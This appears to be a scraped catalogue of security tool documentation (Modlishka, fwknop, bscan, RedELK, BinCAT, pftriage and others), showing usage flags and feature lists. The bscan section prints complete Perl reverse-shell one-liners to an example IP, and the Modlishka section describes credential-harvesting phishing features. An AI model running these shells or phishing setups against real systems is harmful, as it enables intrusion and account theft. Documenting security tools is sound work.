$ npm install @doyensec/electronegativity -g

$ electronegativity -h

$ electronegativity -i /path/to/electron/app

$ electronegativity -i /path/to/asar/archive -o result.csv

• Support for majority of 2FA authentication schemes (by design).
• No website templates (just point Modlishka to the target domain - in most cases, it will be handled automatically).
• Full control of "cross" origin TLS traffic flow from your victims browsers.
• Flexible and easily configurable phishing scenarios through configuration options.
• Pattern based JavaScript payload injection.
• Striping website from all encryption and security headers (back to 90's MITM style).
• User credential harvesting (with context based on URL parameter passed identifiers).
• Can be extended with your ideas through plugins.
• Stateless design. Can be scaled up easily for an arbitrary number of users - ex. through a DNS load balancer.
• Web panel with a summary of collected credentials and user session impersonation (beta).
• Written in Go.

$ go get -u github.com/drk1wi/Modlishka

$ cd $GOPATH/src/github.com/drk1wi/Modlishka/
$ make

# ./dist/proxy -h


Usage of ./dist/proxy:

  -cert string
     base64 encoded TLS certificate

  -certKey string
     base64 encoded TLS certificate key

  -certPool string
     base64 encoded Certification Authority certificate

  -config string
     JSON configuration file. Convenient instead of using command line switches.

  -credParams string
       Credential regexp collector with matching groups. Example: base64(username_regex),base64(password_regex)

  -debug
     Print debug information

  -disableSecurity
     Disable security features like anti-SSRF. Disable at your own risk.

  -jsRules string
     Comma separated list of URL patterns and JS base64 encoded payloads that will be injected. 

  -listeningAddress string
     Listening address (default "127.0.0.1")

  -listeningPort string
     Listening port (default "443")

  -log string
     Local file to which fetched requests will be written (appended)

  -phishing string
     Phishing domain to create - Ex.: target.co

  -plugins string
     Comma seperated list of enabled plugin names (default "all")

  -postOnly
     Log only HTTP POST requests

  -rules string
     Comma separated list of 'string' patterns and their replacements. 

  -target string
     Main target to proxy - Ex.: https://target.com

  -targetRes string
     Comma separated list of target subdomains that need to pass through the  proxy 

  -terminateTriggers string
     Comma separated list of URLs from target's origin which will trigger session termination

  -terminateUrl string
     URL to redirect the client after session termination triggers

  -tls
     Enable TLS (default false)

  -trackingCookie string
     Name of the HTTP cookie used to track the victim (default "id")

  -trackingParam string
     Name of the HTTP parameter used to track the victim (default "id")

• Check out the wiki page for a more detailed overview of the tool usage.
• FAQ (Frequently Asked Questions)
• Blog post

fwknop implements an authorization scheme known as Single Packet Authorization (SPA) for strong service concealment. SPA requires only a single packet which is encrypted, non-replayable, and authenticated via an HMAC in order to communicate desired access to a service that is hidden behind a firewall in a default-drop filtering stance. The main application of SPA is to use a firewall to drop all attempts to connect to services such as SSH in order to make the exploitation of vulnerabilities (both 0-day and unpatched code) more difficult. Because there are no open ports, any service that is concealed by SPA naturally cannot be scanned for with Nmap. The fwknop project supports four different firewalls: iptables, firewalld, PF, and ipfw across Linux, OpenBSD, FreeBSD, and Mac OS X. There is also support for custom scripts so that fwknop can be made to support other infrastructure such as ipset or nftables.

1. Without an HMAC, cryptographically strong authentication is not possible with fwknop unless GnuPG is used, but even then an HMAC should still be applied.
2. An HMAC applied after encryption protects against cryptanalytic CBC-mode padding oracle attacks such as the Vaudenay attack and related trickery (like the more recent "Lucky 13" attack against SSL).
3. The code required by the fwknopd daemon to verify an HMAC is much more simplistic than the code required to decrypt an SPA packet, so an SPA packet without a proper HMAC isn't even sent through the decryption routines.

• Implements Single Packet Authorization around iptables and firewalld firewalls on Linux, ipfw firewalls on *BSD and Mac OS X, and PF on OpenBSD.
• The fwknop client runs on Linux, Mac OS X, *BSD, and Windows under Cygwin. In addition, there is an Android app to generate SPA packets.
• Supports both Rijndael and GnuPG methods for the encryption/decryption of SPA packets.
• Supports HMAC authenticated encryption for both Rijndael and GnuPG. The order of operation is encrypt-then-authenticate to avoid various cryptanalytic problems.
• Replay attacks are detected and thwarted by SHA-256 digest comparison of valid incoming SPA packets. Other digest algorithms are also supported, but SHA-256 is the default.
• SPA packets are passively sniffed from the wire via libpcap. The fwknopd server can also acquire packet data from a file that is written to by a separate Ethernet sniffer (such as with tcpdump -w <file>), from the iptables ULOG pcap writer, or directly via a UDP socket in --udp-server mode.
• For iptables firewalls, ACCEPT rules added by fwknop are added and deleted (after a configurable timeout) from custom iptables chains so that fwknop does not interfere with any existing iptables policy that may already be loaded on the system.
• Supports inbound NAT connections for authenticated SPA communications (iptables firewalls only for now). This means fwknop can be configured to create DNAT rules so that you can reach a service (such as SSH) running on an internal system on an RFC 1918 IP address from the open Internet. SNAT rules are also supported which essentially turns fwknopd into a SPA-authenticating gateway to access the Internet from an internal network.
• Multiple users are supported by the fwknop server, and each user can be assigned their own symmetric or asymmetric encryption key via the /etc/fwknop/access.conf file.
• Automatic resolution of external IP address via https://www.cipherdyne.org/cgi-bin/myip (this is useful when the fwknop client is run from behind a NAT device). Because the external IP address is encrypted within each SPA packet in this mode, Man-in-the-Middle (MITM) attacks where an inline device intercepts an SPA packet and only forwards it from a different IP in an effort to gain access are thwarted.
• Port randomization is supported for the destination port of SPA packets as well as the port over which the follow-on connection is made via the iptables NAT capabilities. The later applies to forwarded connections to internal services and to access granted to local sockets on the system running fwknopd.
• Integration with Tor (as described in this DefCon 14 presentation). Note that because Tor uses TCP for transport, sending SPA packets through the Tor network requires that each SPA packet is sent over an established TCP connection, so technically this breaks the "single" aspect of "Single Packet Authorization". However, Tor provides anonymity benefits that can outweigh this consideration in some deployments.
• Implements a versioned protocol for SPA communications, so it is easy to extend the protocol to offer new SPA message types and maintain backwards compatibility with older fwknop clients at the same time.
• Supports the execution of shell commands on behalf of valid SPA packets.
• The fwknop server can be configured to place multiple restrictions on inbound SPA packets beyond those enforced by encryption keys and replay attack detection. Namely, packet age, source IP address, remote user, access to requested ports, and more.
• Bundled with fwknop is a comprehensive test suite that issues a series of tests designed to verify that both the client and server pieces of fwknop work properly. These tests involve sniffing SPA packets over the local loopback interface, building temporary firewall rules that are checked for the appropriate access based on the testing config, and parsing output from both the fwknop client and fwknopd server for expected markers for each test. Test suite output can easily be anonymized for communication to third parties for analysis.
• fwknop was the first program to integrate port knocking with passive OS fingerprinting. However, Single Packet Authorization offers many security benefits beyond port knocking, so the port knocking mode of operation is generally deprecated.

  --disable-client        Do not build the fwknop client component. The
                          default is to build the client.
  --disable-server        Do not build the fwknop server component. The
                          default is to build the server.
  --with-gpgme            support for gpg encryption using libgpgme
                          [default=check]
  --with-gpgme-prefix=PFX prefix where GPGME is installed (optional)
  --with-gpg=/path/to/gpg Specify path to the gpg executable that gpgme will
                          use [default=check path]
  --with-firewalld=/path/to/firewalld
                          Specify path to the firewalld executable
                          [default=check path]
  --with-iptables=/path/to/iptables
                          Specify path to the iptables executable
                          [default=check path]
  --with-ipfw=/path/to/ipfw
                          Specify path to the ipfw executable [default=check
                          path]
  --with-pf=/path/to/pfctl
                          Specify path to the pf executable [default=check
                          path]
  --with-ipf=/path/to/ipf Specify path to the ipf executable [default=check
                          path]

Examples:

./configure --disable-client --with-firewalld=/bin/firewall-cmd
./configure --disable-client --with-iptables=/sbin/iptables --with-firewalld=no

• netsniff-ng, a fast zero-copy analyzer, pcap capturing and replaying tool
• trafgen, a multithreaded low-level zero-copy network packet generator
• mausezahn, high-level packet generator for HW/SW appliances with Cisco-CLI*
• bpfc, a Berkeley Packet Filter compiler, Linux BPF JIT disassembler
• ifpps, a top-like kernel networking statistics tool
• flowtop, a top-like netfilter connection tracking tool
• curvetun, a lightweight curve25519-based IP tunnel
• astraceroute, an autonomous system (AS) trace route utility

Tools

1. Extract byte sequences and create some statistics
2. Use these statistics, combine length, number of occurrences, similarity and keywords to create a YARA rule

• Length
• Number of occurrences
• Sequence (string)
• Formatted (ascii/wide/hex)
• Hex encoded form
• Entropy

        ____                 __
       / __/__  ___  _______/ /
      / _// _ \/ _ \/ __/ _  /
     /_/ /_//_/\___/_/  \_,_/ Pattern Extractor for Obfuscated Code
     v0.6, Florian Roth

    usage: fnord.py [-h] [-f file] [-m min] [-x max] [-t top] [-n min-occ]
                    [-e min-entropy] [--strings] [--include-padding] [--debug]
                    [--noyara] [-s similarity] [-k keywords-multiplier]
                    [-r structure-multiplier] [-c count-limiter] [--yara-exact]
                    [--yara-strings max] [--show-score] [--show-count]
                    [--author author]

    Fnord - Pattern Extractor for Obfuscated Code

    optional arguments:
      -h, --help            show this help message and exit
      -f file               File to process
      -m min                Minimum sequence length
      -x max                Maximum sequence length
      -t top                Number of items in the Top x list
      -n min-occ            Minimum number of occurrences to show
      -e min-entropy        Minimum entropy
      --strings             Show strings only
      --include-padding     Include 0x00 and 0x20 in the extracted strings
      --debug               Debug output

    YARA Rule Creation:
      --noyara              Do not generate an experimental YARA rule
      -s similarity         Allowed similarity (use values between 0.1=low and
                            10=high, default=1.5)
      -k keywords-multiplier
                            Keywords multiplier (multiplies score of sequences if
                            keyword is found) (best use values between 1 and 5,
                            default=2.0)
      -r structure-multiplier
                            Structure multiplier (multiplies score of sequences if
                            it is identified as code structure and not payload)
                            (best use values between 1 and 5, default=2.0)
      -c count-limiter      Count limiter (limts the impact of the count by
                            capping it at a certain amount) (best use values
                            between 5 and 100, default=20)
      --yara-exact          Add magic header and magic footer limitations to the
                            rule
      --yara-strings max    Maximum sequence length
      --show-score          Show score in comments of YARA rules
      --show-count          Show count in sample in comments of YARA rules
      --author author       YARA rule author

1. git clone https://github.com/Neo23x0/Fnord.git and cd Fnord
2. pip3 install -r ./requirements.txt
3. python3 ./fnord.py --help

python3 fnord.py -f ./test/wraeop.sct --yara-strings 10

python3 fnord.py -f ./test/vbs.txt --show-score --show-count -t 1 -x 20

python3 fnord.py -f ./test/inv-obf.txt --show-score --show-count -t 1 --yara-strings 4 --yara-exact

• value analysis (registers and memory)
• taint analysis
• type reconstruction and propagation
• backward and forward analysis
• use-after-free and double-free detection

• Basic analysis
• Using data tainting

• IDA plugin: all, version 6.9 or later (BinCAT uses PyQt, not PySide)
• analyzer (local or remote): Linux, Windows, macOS (maybe)

• x86-32
• ARMv7
• ARMv8
• PowerPC

• the analyzer
• the IDA plugin

• Extract the binary distribution of BinCAT (not the git repo)
• In IDA, click on "File -> Script File..." menu (or type ALT-F7)
• Select install_plugin.py
• BinCAT is now installed in your IDA user dir
• Restart IDA

• Using Docker: Docker installation instructions
• Manual: build and installation instructions

• build instructions

• Windows manual install.
• Linux manual install

• download https://bootstrap.pypa.io/get-pip.py (verify it's good ;)
• ~/.wine/drive_c/Python27/python.exe get-pip.py

• Load the plugin by using the Ctrl-Shift-B shortcut, or using the Edit -> Plugins -> BinCAT menu
  
• Go to the instruction where you want to start the analysis
  
• Select the BinCAT Configuration pane, click <-- Current to define the start address
  
• Launch the analysis
  

• "Use remote bincat": select if you are running docker in a Docker container
• "Remote URL": http://localhost:5000 (or the URL of a remote BinCAT server)
• "Autostart": autoload BinCAT at IDA startup
• "Save to IDB": default state for the save to idb checkbox

• SSTIC 2017, Rennes, France: article (english), slides (french), video of the presentation (french)
• REcon 2017, Montreal, Canada: slides, video

pip install bscan

pip install https://github.com/welchbj/bscan/archive/master.tar.gz

$ bscan \
> --max-concurrency 3 \
> --patterns [Mm]icrosoft \
> --status-interval 10 \
> --verbose-status \
> scanme.nmap.org

• --max-concurrency 3 means that no more than 3 concurrent scan subprocesses will be run at a time
• --patterns [Mm]icrosoft defines a custom regex pattern with which to highlight matches in the generated scan output
• --status-interval 10 tells bscan to print runtime status updates every 10 seconds
• --verbose-status means that each of these status updates will print details of all currently-running scan subprocesses
• scanme.nmap.org is the host upon which we want to enumerate

• patterns.txt specifies the regex patterns to be highlighted in console output when matched with scan output
• required-programs.txt specifies the installed programs that bscan plans on using
• port-scans.toml defines the port-discovering scans to be run on the target(s), as well as the regular expressions used to parse port numbers and service names from scan output
• service-scans.toml defines the scans be run on the target(s) on a per-service basis

usage: bscan [OPTIONS] targets

 _
| |__  ___  ___ __ _ _ __
| '_ \/ __|/ __/ _` | '_ \
| |_) \__ \ (__ (_| | | | |
|_.__/|___/\___\__,_|_| |_|

an asynchronous service enumeration tool

positional arguments:
  targets               the targets and/or networks on which to perform enumeration

optional arguments:
  -h, --help            show this help message and exit
  --brute-pass-list F   filename of password list to use for brute-forcing
  --brute-user-list F   filename of user list to use for brute-forcing
  --cmd-print-width I   the maximum integer number of characters allowed when printing
                        the command used to spawn a running subprocess (defaults to 80)
  --config-dir D        the base directory from which to load the configuration files;
                        required configuration files missing from this directory will
                        instead be loaded from the default files shipped with this
                        program
  --hard                force overwrite of existing directories
  --max-concurrency I   maximum integer number of subprocesses permitted to be running
                        concurrently (defaults to 20)
  --no-program-check    disable checking the presence of required system programs
  --no-file-check       disable checking the presence of files such as configured
                        wordlists
  --no-service-scans    disable running scans on discovered services
  --output-dir D        the base directory in which to write output files
  --patterns [ [ ...]]  regex patterns to highlight in output text
  --ping-sweep          enable ping sweep filtering of hosts from a network range
                        before running more intensive scans
  --quick-only          whether to only run the quick scan (and not include the
                        thorough scan over all ports)
  --qs-method S         the method for performing the initial TCP port scan; must
                        correspond to a configured port scan
  --status-interval I   integer number of seconds to pause in between printing status
                        updates; a non-positive value disables updates (defaults to 30)
  --ts-method S         the method for performing the thorough TCP port scan; must
                        correspond to a configured port scan
  --udp                 whether to run UDP scans
  --udp-method S        the method for performing the UDP port scan; must correspond
                        to a configured port scan
  --verbose-status      whether to print verbose runtime status updates, based on
                        frequency specified by `--status-interval` flag
  --version             program version
  --web-word-list F     the wordlist to use for scans

$ bscan-wordlists --find "*win*"
/usr/share/wordlists/wfuzz/vulns/dirTraversal-win.txt
/usr/share/wordlists/metasploit/sensitive_files_win.txt
/usr/share/seclists/Passwords/common-passwords-win.txt

$ bscan-shells --port 443 10.10.10.10 | grep -i -A1 perl
perl for windows
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

perl with /bin/sh
perl -e 'use Socket;$i="10.10.10.10";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl without /bin/sh
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

# setup the environment
mkvirtualenv -p $(which python3) bscan-dev
workon bscan-dev

# get the deps
pip install -r dev-requirements.txt

flake8 . && mypy bscan

# build source and wheel distributions
python setup.py bdist_wheel sdist

# run post-build checks
twine check dist/*

# upload to PyPI
twine upload dist/*

• Video: https://www.youtube.com/watch?v=OjtftdPts4g
• Presentation slides: https://github.com/outflanknl/Presentations/blob/master/MirrorOnTheWall_BruCon2018_UsingBlueTeamTechniquesinRedTeamOps_Bergman-Smeets_FINAL.pdf

1. Enhanced usability and overview for the red team operators by creating a central location where all relevant operational logs from multiple teamservers are collected and enriched. This is great for historic searching within the operation as well as giving a read-only view on the operation (e.g. for the White Team). Especially useful for multi-scenario, multi-teamserver, multi-member and multi-month operations. Also, super easy ways for viewing all screenshots, IOCs, keystrokes output, etc. \o/
2. Spot the Blue Team by having a central location where all traffic logs from redirectors are collected and enriched. Using specific queries its now possible to detect that the Blue Team is investigating your infrastructure.
3. Out-of-the-box usable by being easy to install and deploy, as well as having ready made views, dashboards and alarms.

• Cobalt Strike teamservers
• HAProxy for HTTP redirector data. Apache support is expected soon.
• Tested on Ubuntu 16 LTS

log-format frontend:%f/%H/%fi:%fp\ backend:%b\ client:%ci:%cp\ GMT:%T\ useragent:%[capture.req.hdr(1)]\ body:%[capture.req.hdr(0)]\ request:%r

declare capture request len 40000
http-request capture req.body id 0
capture request header User-Agent len 512

• $FilebeatID is the identifier of this redirector within filebeat.
• $ScenarioName is the name of the attack scenario this redirector is used for.
• $IP/DNS:PORT is the IP or DNS name and port where filebeat logs are shipped to.

• $FilebeatID is the identifier of this teamserver within filebeat.
• $ScenarioName is the name of the attack scenario this teamserver is used for.
• $IP/DNS:PORT is the IP or DNS name and port where filebeat logs are shipped to.

• /etc/redelk/iplist_customer.conf : public IP addresses of your target, one per line. Including an address here will set a tag for applicable records in the redirhaproxy-* index.
• /etc/redelk/iplist_redteam.conf : public IP addresses of your red team, one per line. Convenient for identifying testing done by red team members. Including an address here will set a tag for applicable records in the redirhaproxy-* index.
• /etc/redelk/iplist_unknown.conf : public IP addresses of gateways that you are not sure about yet, but don't want to be warned about again. One per line. Including an address here will set a tag for applicable records in the redirhaproxy-* index.
• /etc/redelk/known_sandboxes.conf : beacon characteristics of known AV sandbox systems. One per line. Including data here here will set a tag for applicable records in the rtops-* index.
• /etc/redelk/known_testsystems.conf : beacon characteristics of known test systems. One per line. Including data here here will set a tag for applicable records in the rtops-* index.
• /etc/redelk/alarm.json.config: details required for alarms to work. This includes API keys for online services (Virus Total, IBM X-Force, etc) as well as the SMTP details required for sending alarms via e-mail.

• Include the real external IP address of a beacon. As Cobalt Strike has no knowledge of the real external IP address of a beacon session, we need to get this form the traffic index. So far, we have not found a true 100% reliable way for doing this.
• Support for Apache redirectors. Fully tested and working filebeat and logstash configuration files that support Apache based redirectors. Possibly additional custom log configuration needed for Apache. Low priority.
• Solve rsyslog max log line issue. Rsyslog (default syslog service on Ubuntu) breaks long syslog lines. Depending on the CS profile you use, this can become an issue. As a result, the parsing of some of the fields are properly parsed by logstash, and thus not properly included in elasticsearch.
• Ingest manual IOC data. When you are uploading a document, or something else, outside of Cobalt Strike, it will not be included in the IOC list. We want an easy way to have these manual IOCs also included. One way would be to enter the data manually in the activity log of Cobalt Strike and have a logstash filter to scrape the info from there.
• Ingest e-mails. Create input and filter rules for IMAP mailboxes. This way, we can use the same easy ELK interface for having an overview of sent emails, and replies.
• User-agent checks. Tagging and alarming on suspicious user-agents. This will probably be divided in hardcoded stuff like curl, wget, etc connecting with the proper C2 URL's, but also more dynamic analysis of suspicious user-agents.
• DNS traffic analyses. Ingest, filter and query for suspicious activities on the DNS level. This will take considerable work due to the large amount of noise/bogus DNS queries performed by scanners and online DNS inventory services.
• Other alarm channels. Think Slack, Telegram, whatever other way you want for receiving alarms.
• Fine grained authorisation. Possibility for blocking certain views, searches, and dashboards, or masking certain details in some views. Useful for situations where you don't want to give out all information to all visitors.

• Marc Smeets (@smeetsie on Github and @mramsmeets on Twitter).
• Mark Bergman (@xychix on Github and Twitter)

• Importer
  • Creator (fast creation of multiple related instances via web interface) for systems and tasks,
  • CSV (simple and generic CSV based import (either hostname and IP or hostname and tags combined with a web form), should fit for the export capabilities of many tools),
  • Markdown for entries (one entry per system(report)).
• Exporter
  • Markdown for so-called system reports (for use in a MkDocs structure),
  • Spreadsheet (CSV and XLS),
  • LaTeX (planned).

• django (2.0),
• django_q,
• djangorestframework,
• gunicorn,
• postgresql,
• psycopg2-binary,
• python3-pip,
• PyYAML,
• requests,
• virtualenv,
• xlwt.

docker-compose up

docker/setup_admin.sh

• Bootstrap
• clipboard.js
• DataTables
• jQuery
• Open Iconic
• Popper.js

• master
• development

• Built from scratch with new ideas for analysis mechanisms
• Bundles features of many other tools in one place
• Modular and extensible: Read the docs and implement your own analysis mechanisms
• Comfortable analysis using a GUI
• Manage work in separate projects using a database
• Documentation: Read the docs if you need a manual or technical info.

• Run sudo ./install_requirements.sh along with sudo -E ./CANalyzat0r.sh. This will create a folder called pipenv with a pipenv environment in it.
• Or just use the docker version which is recommended at this time (Check the README.md file in the subdirectory)

• Manage interface configuration (automatic loading of kernel modules, manage physical and virtual SocketCAN devices)
• Multi interface support
• Manage your work in projects. You can also import and export them in the human readable/editable JSON format
• Logging of all actions
• Graphical sniffing
• Manage findings, dumps and known packets per project

• Easy copy and paste between tabs. Also, you can just paste your SocketCAN files into a table that allows pasting

• Threaded Sending, Fuzzing and Sniffing 

• Sniffing at the same time

• Quick way: Execute echo "[QT]\nstyle=CleanLooks" >> ~/.config/Trolltech.conf
  
• Alternative way:
  
  • Install qt4-qtconfig: sudo apt-get install qt4-qtconfig
  • Run qtconfig-qt4 as superuser and change the GUI style to CleanLooks or GTK+
• Or use the docker container

• A detailed overview of system activity with highlighting.
• Graphs and statistics allow you quickly to track down resource hogs and runaway processes.
• Can't edit or delete a file? Discover which processes are using that file.
• See what programs have active network connections, and close them if necessary.
• Get real-time information on disk access.
• View detailed stack traces with kernel-mode, WOW64 and .NET support.
• Go beyond services.msc: create, edit and control services.
• Small, portable and no installation required.
• 100% Free Software (GPL v3)

1. Make sure "Hide extensions for known file types" is unticked in Tools > Folder options > View.
2. Right-click in the folder and choose New > Text Document.
3. Rename the file to ProcessHacker.exe.settings.xml (delete the ".txt" extension).

• Capturing kernel-mode stack traces
• More efficiently enumerating process handles
• Retrieving names for file handles
• Retrieving names for EtwRegistration objects
• Setting handle attributes

1. In Registry Editor, navigate to: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\KProcessHacker3
2. Under this key, create a key named Parameters if it does not exist.
3. Create a DWORD value named SecurityLevel and set it to 2. If you are not using an official build, you may need to set it to 0 instead.
4. Restart the KProcessHacker3 service (sc stop KProcessHacker3, sc start KProcessHacker3).

• No need of remembering command line parameters.
• Storage of the operating system profile, KDBG address and process list with the memory dump, in a .CFG file. When a memory image is re-loaded, this saves a lot of time and avoids the frustration of not knowing the correct profile to select.
• Simpler copy & paste.
• Simpler printing of paper copies (via right click).
• Simpler saving of the dumped information to a file on disk.
• A drop down list of available commands and a short description of what the command does.
• Time stamping of the commands executed.
• Auto-loading the first dump file found in the current folder.
• Support for analysing Mac and Linux memory dumps.

• FTP
• POP
• SMTP
• IMAP
• DNS
• IPP
• HTTP
• MDNS
• NTP
• NETBIOS
• NFS
• SSDP
• BGP
• SNMP
• XDMCP
• SMB
• SYSLOG
• DHCP
• PostgreSQL
• MySQL
• TDS
• DirectDownloadLink
• I23V5
• AppleJuice
• DirectConnect
• Socrates
• WinMX
• VMware
• PANDO
• Filetopia
• iMESH
• Kontiki
• OpenFT
• Kazaa/Fasttrack
• Gnutella
• eDonkey
• Bittorrent
• OFF
• AVI
• Flash
• OGG
• MPEG
• QuickTime
• RealMedia
• Windowsmedia
• MMS
• XBOX
• QQ
• MOVE
• RTSP
• Feidian
• Icecast
• PPLive
• PPStream
• Zattoo
• SHOUTCast
• SopCast
• TVAnts
• TVUplayer
• VeohTV
• QQLive
• Thunder/Webthunder
• Soulseek
• GaduGadu
• IRC
• Popo
• Jabber
• MSN
• Oscar
• Yahoo
• Battlefield
• Quake
• VRRP
• Steam
• Halflife2
• World of Warcraft
• Telnet
• STUN
• IPSEC
• GRE
• ICMP
• IGMP
• EGP
• SCTP
• OSPF
• IP in IP
• RTP
• RDP
• VNC
• PCAnywhere
• SSL
• SSH
• USENET
• MGCP
• IAX
• TFTP
• AFP
• StealthNet
• Aimini
• SIP
• Truphone
• ICMPv6
• DHCPv6
• Armagetron
• CrossFire
• Dofus
• Fiesta
• Florensia
• Guildwars
• HTTP Application Activesync
• Kerberos
• LDAP
• MapleStory
• msSQL
• PPTP
• WARCRAFT3
• World of Kung Fu
• MEEBO
• FaceBook
• Twitter
• DropBox
• Gmail
• Google Maps
• YouTube
• Skype
• Google
• DCE RPC
• NetFlow_IPFIX
• sFlow
• HTTP Connect (SSL over HTTP)
• HTTP Proxy
• Netflix
• Citrix
• CitrixOnline/GotoMeeting
• Apple (iMessage, FaceTime…)
• Webex
• WhatsApp
• Apple iCloud
• Viber
• Apple iTunes
• Radius
• WindowsUpdate
• TeamViewer
• Tuenti
• LotusNotes
• SAP
• GTP
• UPnP
• LLMNR
• RemoteScan
• Spotify
• H323
• OpenVPN
• NOE
• CiscoVPN
• TeamSpeak
•  Tor
•  CiscoSkinny
•  RTCP
•  RSYNC
•  Oracle
•  Corba
•  UbuntuONE
•  CNN
•  Wikipedia
• Whois-DAS
•  Collectd
•  Redis
•  ZeroMQ
•  Megaco
• QUIC
• WhatsApp Voice
• Stracraft
• Teredo
• Snapchat
• Simet
• OpenSignal
• 99Taxi
• GloboTV
• Deezer
• Instagram
• Microsoft cloud services
• Twitch
• KakaoTalk Voice and Chat
• HotspotShield VPN

• pefile
• filemagic

$ brew install libmagic

usage: pftriage [options]

Show information about a file for triage.

positional arguments:
  file                  The file to triage.

optional arguments:
  -h, --help            show this help message and exit
  -i, --imports         Display import tree
  -s, --sections        Display overview of sections. For more detailed info
                        pass the -v switch
  --removeoverlay       Remove overlay data.
  --extractoverlay      Extract overlay data.
  -r, --resources       Display resource informations
  -D DUMP_OFFSET, --dump DUMP_OFFSET
                        Dump data using the passed offset or 'ALL'. Currently
                        only works with resources.
  -a, --analyze         Analyze the file.
  -v, --verbose         Display version.
  -V, --version         Print version and exit.

 ---- Section Overview (use -v for detailed section info)  ----

 Name        Raw Size    Raw Data Pointer  Virtual Address     Virtual Size        Entropy             Hash
 .text       0x00012200  0x00000400        0x00001000          0x000121d8          6.71168555177       ff38fce4f48772f82fc77b4ef223fd74
 .rdata      0x00005a00  0x00012600        0x00014000          0x0000591a          4.81719489022       b0c15ee9bf8480a07012c2cf277c3083
 .data       0x00001a00  0x00018000        0x0001a000          0x0000ab80          5.28838495072       5d969a878a5106ba526aa29967ef877f
 .rsrc       0x00002200  0x00019a00        0x00025000          0x00002144          7.91994689603       d361caffeadb934c9f6b13b2474c6f0f
 .overlay    0x00009b30  0x0001bc00        0x00000000          0x00000000          0                   N/A

 ---- Resource Overview ----

 Type: CODATA
  Name        Language        SubLang             Offset      Size        Code Page   Type
  0x68        LANG_RUSSIAN    RUSSIAN             0x000250e0  0x00000cee  0x000004e4
  0x69        LANG_RUSSIAN    RUSSIAN             0x00025dd0  0x000011e6  0x000004e4

 Type: RT_MANIFEST
  Name        Language        SubLang             Offset      Size        Code Page   Type
  0x1         LANG_ENGLISH    ENGLISH_US          0x00026fb8  0x0000018b  0x000004e4

[*] Loading File...
 ---- Imports ----
 Number of imported modules: 4

 KERNEL32.dll
  |-- GetProcessHeap
  |-- HeapFree
  |-- HeapAlloc
  |-- SetLastError
  |-- GetLastError

 WS2_32.dll
  |-- getaddrinfo
  |-- freeaddrinfo
  |-- closesocket Ordinal[3] (Imported by Ordinal)
  |-- WSAStartup Ordinal[115] (Imported by Ordinal)
  |-- socket Ordinal[23] (Imported by Ordinal)
  |-- send Ordinal[19] (Imported by Ordinal)
  |-- recv Ordinal[16] (Imported by Ordinal)
  |-- connect Ordinal[4] (Imported by Ordinal)

 ole32.dll
  |-- CoCreateInstance
  |-- ...

[*] Loading File...

 ---- Exports ----
 Total Exports: 5
 Address     Ordinal   Name
 0x00001151  1         FindResources
 0x00001103  2         LoadBITMAP
 0x00001137  3         LoadICON
 0x000010e9  4         LoadIMAGE
 0x0000111d  5         LoadSTRINGW

[*] Loading File...
[*] Processing File details...


---- File Summary ----

 General
     Filename         samaple.exe
     Magic Type       PE32 executable (GUI) Intel 80386, for MS Windows
     Size             135168
     First Bytes      4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00

 Hashes
     MD5              8e8a8fe8361c7238f60d6bbfdbd304a8
     SHA1             557832efe10daff3f528a3c3589eb5a6dfd12447
     SHA256           118983ba4e1c12a366d7d6e9461c68bf222e2b03f3c1296091dee92ac0cc9dd8
     Import Hash      0239fd611af3d0e9b0c46c5837c80e09
     ssdeep           

 Headers
     Subsystem        IMAGE_SUBSYSTEM_WINDOWS_GUI
     Linker Version   12.0 - (Visual Studio 2013)
     Image Base       0x400000
     Compile Time     Thu Jun 23 16:04:21 2016 UTC
     Checksum         0
     Filename         sample.exe
     EP Bytes         55 8b ec 51 83 65 fc 00 8d 45 fc 56 57 50 e8 64
     Signature        0x4550
     First Bytes      4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00
     Sections         4
     Entry Point      0x139de
     Packed           False
     Size             135168
     Characteristics
                      IMAGE_FILE_32BIT_MACHINE
                      IMAGE_FILE_EXECUTABLE_IMAGE
                      IMAGE_FILE_RELOCS_STRIPPED

[*] Loading File...
[*] Analyzing File...
[*] Analysis Complete...

  [!] Checksum        Invalid CheckSum
  [!] AntiDebug       AntiDebug Function import [GetTickCount]
  [!] AntiDebug       AntiDebug Function import [QueryPerformanceCounter]
  [!] Imports         Suspicious API Call [TerminateProcess]
  [!] AntiDebug       AntiDebug Function import [SetUnhandledExceptionFilter]
  [!] AntiDebug       AntiDebug Function import [IsDebuggerPresent]

1. Available for Linux kernels 2.6.32 and newer.
2. No need to patch the kernel: just load the kernel module.
3. 10 Gbit Hardware Packet Filtering using commodity network adapters
4. User-space ZC (new generation DNA, Direct NIC Access) drivers for extreme packet capture/transmission speed as the NIC NPU (Network Process Unit) is pushing/getting packets to/from userland without any kernel intervention. Using the 10Gbit ZC driver you can send/received at wire-speed at any packet sizes.
5. PF_RING ZC library for distributing packets in zero-copy across threads, applications, Virtual Machines.
6. Device driver independent.
7. Support of Accolade, Exablaze, Endace, Fiberblaze, Inveatech, Mellanox, Myricom/CSPI, Napatech, Netcope and Intel (ZC) network adapters.
8. Kernel-based packet capture and sampling.
9. Libpcap support (see below) for seamless integration with existing pcap-based applications.
10. Ability to specify hundred of header filters in addition to BPF.
11. Content inspection, so that only packets matching the payload filter are passed.
12. PF_RING™ plugins for advanced packet parsing and content filtering.

$ sudo pip install uefi_firmware

$ sudo python ./setup.py install

• Python development headers, usually found in the python-dev package.
• The compression/decompression features will use the python headers and gcc.
• pefile is optional, and may be used for additional parsing.

import uefi_firmware
with open('/path/to/firmware.rom', 'r') as fh:
  file_content = fh.read()
parser = uefi_firmware.AutoParser(file_content)
if parser.type() != 'unknown':
  firmware = parser.parse()
  firmware.showinfo()

• process() performs parsing work and returns a True or False
• showinfo() print a hierarchy of information about the structure
• dump() walk the hierarchy and write each to a file

$ uefi-firmware-parser -h
usage: uefi-firmware-parser [-h] [-b] [--superbrute] [-q] [-o OUTPUT] [-O]
                            [-c] [-e] [-g GENERATE] [--test]
